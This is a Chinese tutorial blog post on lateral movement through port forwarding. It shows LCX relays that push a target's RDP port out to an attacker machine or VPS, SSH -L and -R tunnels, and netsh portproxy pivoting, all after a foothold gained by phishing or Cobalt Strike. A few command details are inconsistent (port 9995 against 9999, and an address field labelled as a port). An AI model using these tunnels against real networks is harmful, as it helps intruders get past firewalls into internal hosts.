内网隧道:端口转发

news2024/12/22 14:25:39

目录

LCX端口转发

场景一

场景二

SSH的端口转发

一、本地转发(正向访问A):

二、远程转发(反向访问A)

三.NETSH端口转发


端口转发和端口映射

端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将 一个端口收到的流量转发到另一个端口。 端口映射是 NAT的一种,功能是把在公网的地址转成私有地址。简单来说,端口映射就是将一个端口映射 到另一个端口供其他人使用

端口转发:只针对于机器的某个特定端口

本次实验三种端口转发:

LCX

SSH

NETSH

LCX端口转发

介绍:

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制

场景一

由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发,Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器的3389端口

总结:目标机器的3389不对外开放,连接不上,我们可以用端口转发

环境准备:

1.3389不允许出网

2.3389开启

利用:

1.先上线CS

2.上传需要的工具LCX

3、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口

lcx.exe -listen 53 1111

4、在web靶机上运行以下命令, 将本地的3389端口转发到192.168.3.27的 53端口

lcx.exe -slave 攻击机IP 53 靶机本地IP 3389

攻击机上接收成功

5、在攻击机器上运行远程桌面,地址为127.0.0.1:1111

连接成功

场景二

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的54端口,这个时候攻击者在VPS监听54端口并且转发到1111端口,这个时候攻击者连接VPS的1111端口,等于访问web服务器的3389端口

这个和上面一样,只不过中间加了一个VPS,本地机器通过连接对方机器转发到的VPS的端口,就可以实现3389访问

SSH的端口转发

介绍:

SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能

一、本地转发(正向访问A):

A可访问B,不能访问C,但是B可以访问C,可以用代理将C的3389端口转到B机器的其他端口,从而使A访问B机器的代理端口,从而可以间接访问C的3389端口,前提是知道了C机器的账号密码

利用:

1、使用webshell或者其他其他的方式连接到B机器

比如:我们拿下了机器B,可以用本地的ssh连接上机器B,从而在机器B上进行端口转发

ssh 账号@IP

这里用本地机器A来SSH机器B,注意要输入机器B的密码

2.使用转发的命令进行转发

ssh -CfNg -L 本地端口:主机B_IP:主机B_端口 跳板主机A_IP

在B机器上操作,C机器代理到B机器的9999端口

3.本地连接B机器的9999端口即可

注意:在实际情况,我们可以通过机器B,可能找到内网才能访问得WEB服务等,我们可以将这个服务转发到公网上面,我们访问这个web服务,通过利用漏洞打下这个服务,那么我们就可以进入内网

二、远程转发(反向访问A)

实验场景:

攻击机者已经拿下了机器B 但是因为是内网机器所以无法直接访问,同时无法访问c主机,但是因为b有ssh,我们使用远程转发,就是机器A是公网机器,B和C机器是内网机器,B可以访问A,B可以访问C,但是A不能访问C,我们通过钓鱼使B机器上线,然后利用远程转发使机器A可以访问C机器,前提知道C机器的密码

利用:

1、通过反向连接(钓鱼)的方式连入公司的网络

然后ssh连接或者在CS上面执行shell命令

ssh root@IP

2、在机器上B执行如下的转发命令:

ssh -CfNg -R 攻击者端口:目标主机IP:目标主机端口 -fN 攻击者_IP

3、在攻击的机器上访问端口就可

NETSH端口转发

介绍:

netsh是windows系统自带命令行程序,攻击者无需上传第三方工具即可利用netsh程序可进行端口转发操作,可将内网中其他服务器的端口转发至本地访问运行这个工具需要管理员的权限

场景:

现在有如下的网络,电脑A是攻击机器,可以直接访问电脑B,但是访问不了机器C,C机器不出网,可以借助B机器上的netsh命令进行端口转发访问机器C,这里注意只能访问端口

利用:

1.首先钓鱼上线

2.通过远控攻击在B上执行如下的命令(只有管理员才能执行):

netsh interface portproxy add v4tov4 listenaddress=机器B的IP listenport=9999 connectport=22 connectaddress=机器C的端口)

3.查看是否开启转发:

netsh interface portproxy show v4tov4

4.在攻击机器A上运行连接靶机C的端口

ssh root@机器B的IP -p 9995

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2119782.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

视频监控接入平台web客户端有时无法登录,有时打开实时视频出现黑屏的问题解决

目录 一、背景说明 二、解决过程 1、问题产生 2、命令介绍 ①基本用法 ②常用选项 ③示例 3、问题解决 三、最终结果 一、背景说明 在本地登录视频监控平台的服务器进行测试时,发现客户端登录不上。 检查服务器的服务和数据库,运行状况正常&#xff0c…

45个图源二维码分享及使用方法

我们曾在《40个图源二维码分享及使用方法》一文中,为你分享了40个图源二维码。 现在在此基础之上新增5个图源二维码,共分享45个。 如果你需要这些图源,请在文末查看领取方式。 45个图源 打开下面的网址进入水经微图(简称“微图…

Swift 创建扩展(Extension)

类别(Category) 和 扩展(Extension) 的 用法很多. 常用的 扩展(Extension) 有分离代码和封装模块的功能,例如登陆页面有注册功能,有登陆功能,有找回密码功能,都写在一个页面就太冗余了,可以考虑使用 扩展(Extension) 登陆页面的方法来分离代码 本文介绍Swift 如何创建扩展(Ex…

maven项目下使用Jacoco测试覆盖率

【本文前提是了解maven项目及其Pom.xml机制,不熟悉可以看该博客的0.Pre部分Auto-Unit-Test-Case-Generator -- java项目自动测试生成-CSDN博客】 JaCoCo(Java Code Coverage)是一个开源的代码覆盖率工具,专门用于测量 Java 应用程…

Web测试中如何简单定位Bug

定位bug之前要确定自己对用例的理解是否有问题。(在工作中,很多测试结果错误都是因为自己对用例的理解没有到位,以致于操作错误导致结果不符合预期) 一般来说bug分为前端bug和后端bug,前端bug为请求数据错误,后端bug为…

web基础之信息泄露

1、目录遍历漏洞 (1)原理:本质是没有过滤用户输入的 ../ 相关的目录跳转符,使得攻击者通过目录跳转符来遍历服务器中的任意文件。 (2)题解: eg:根据提示遍历网页目录信息,会在某一个…

vscode---snippets配置全局代码片段,快捷开发!

代码片段的作用:在开发一个项目时,经常会遇到好多同一个代码逻辑,可配置固顶逻辑的代码块,避免重复敲同一代码; 举例:比如跳转登录,需要调用app的客户端方法,api调用跳转&#xff1…

Web 原生组件化方案:Web Components

你好,我是沐爸,欢迎点赞、收藏、评论和关注。 Web 组件化是一种将Web应用的UI部分拆分成可复用的独立组件的架构方法。这种方法有助于提高代码的可维护性、可重用性和可测试性。 而Web Components 标准则提供了一套原生的API,允许开发者创建…

TestCraft - GPT支持的测试想法生成器和自动化测试生成器

在当今快速变化的软件开发世界中,自动化测试已成为确保软件质量的关键环节。而随着AI技术的进步,越来越多的工具开始引入人工智能,来辅助生成测试用例和自动化测试脚本。其中,TestCraft,作为一款GPT支持的测试想法生成…

天命所归,SyntaxFlow助大圣取得真经

之前预告许久的SyntaxFlow功能已经登陆Yakit! SyntaxFlow代码查询需要先进行项目编译。 手动编译 在前端的YakRunner界面,主界面或选项栏可以直接点击“编译项目”功能。 可见图中红色方框圈起的选项 编译项目的选项如下:必选项为项目名、…

工控机防病毒/防勒索病毒如何一步搞定?

随着勒索病毒的肆虐和内部运营泄密事件的频发,企业数据安全正面临着前所未有的挑战。苏州深信达网络科技有限公司,作为数据安全解决方案的先驱,推出了MCK主机加固解决方案,为企业数据安全提供了一道坚不可摧的防线。 MCK主机加固…

Linux:多路转接 select、poll、epoll

目录 1:select 1. 参数解释 2. 函数返回值 3. fd_set 4. fd_set 相关接口 5. timeval 5. 常见使用 6. 理解 select 执行过程 7. select 的特点 8. select 缺点 9. select 应用 2:socket 就绪条件 1. 读事件就绪(Readable&#x…

智能优化算法-海马优化算法(SHO)(附源码)

目录 1.内容介绍 2.部分代码 3.实验结果 4.内容获取 1.内容介绍 海马优化算法 (Seahorse Optimization Algorithm, SHO) 是一种基于群体智能的元启发式优化算法,它模拟了海马的觅食行为、繁殖行为以及社会互动,用于解决复杂的优化问题。 SHO的工作机制…

精选干货!分享5款ai智能写论文软件

在当今信息爆炸的时代,AI智能写作工具已经成为我们写作过程中的得力助手。特别是对于学术论文的撰写,这些工具不仅能够提高写作效率,还能帮助用户生成高质量的文稿。以下是五款值得推荐的AI智能写论文软件,其中特别推荐千笔-AIPas…

Path系统环境变量和CLASSPATH环境变量

Path系统环境变量 概述:Path环境变量不是java的,它隶属于windows操作系统 作用: PATH环境变量实际上就是给windows操作系统指路的。 在Path环境变量中有很多路径,路径和路径之间采用 分号(;) 隔开在DOS命令窗口中输入一条DOS命…

Vscode中搭建ABAP开发环境

文章目录 前提(在SAP系统中测试)1.1 登录sap 系统1.2激活测服务测试1.3 添加服务 下载Vscode2.1 安装ABAP Remote filesystem 打开ABAP System3.1 按照CtrlshiftP 找到AbapFs Connect to an ABAP system 前提(在SAP系统中测试) 1…

2-89 基于matlab的图像去噪方法

基于matlab的图像去噪方法,对比了常见的几种去噪方法,含中值滤波,均值滤波,维纳滤波,高斯滤波,以及三种形态学滤波(一般的,改进的,多结构元素形态学滤波)&…

HarmonyOS开发之Tab样式(背景高亮样式)

一:开发环境 二:效果图 三:实现步骤 Entry Component struct TabsPage {State tabArray:string[] ["首页","分类","应用","热点","我的"]State focusIndex: number 0;State index: num…

嵌入式学习(哈希表)

哈希表中元素是由哈希函数确定的,将数据元素的关键字key作为自变量,通过一定的函数关系(称为哈希函数),计算出的值,即为该元素的存储地址。 哈希函数:指将哈希表中元素的关键键值映射为元素存储…

局域网远程桌面工具:NoMachine 介绍、安装与使用

局域网远程桌面工具:NoMachine 介绍、安装与使用 NoMachine 简介Linux 安装Windows安装使用 NoMachine 简介 NoMachine是一款很常见的远程桌面工具,尤其在EDA领域,常常被用作远程接入方案。NoMachine可以用于个人远程连接,类似于…